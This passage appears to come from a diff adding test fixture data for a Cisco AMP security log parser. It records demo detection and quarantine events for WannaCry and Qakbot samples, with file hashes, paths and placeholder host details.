"47a9ad4125b6bd7c55e4e7da251e23f089407b8f", + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "file.name": "taskdl.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49887, + "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "4fef5e34143e646dbf9907c4374276f5", + "47a9ad4125b6bd7c55e4e7da251e23f089407b8f" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51525, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 52645, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558984", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 791000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53765, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 783000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55136, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558982", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 727000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56507, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 7144, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 721000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 58030, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 7144, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 59553, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 504000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 60814, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 426000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 62075, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 768, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 399000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 63680, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 768, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 199000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662859016176000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 65285, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:31.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 856000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662854721208000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 66208, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241035", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 233000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 67131, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 68332, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 69533, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241035", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "el2j9fcqj.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 70734, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + 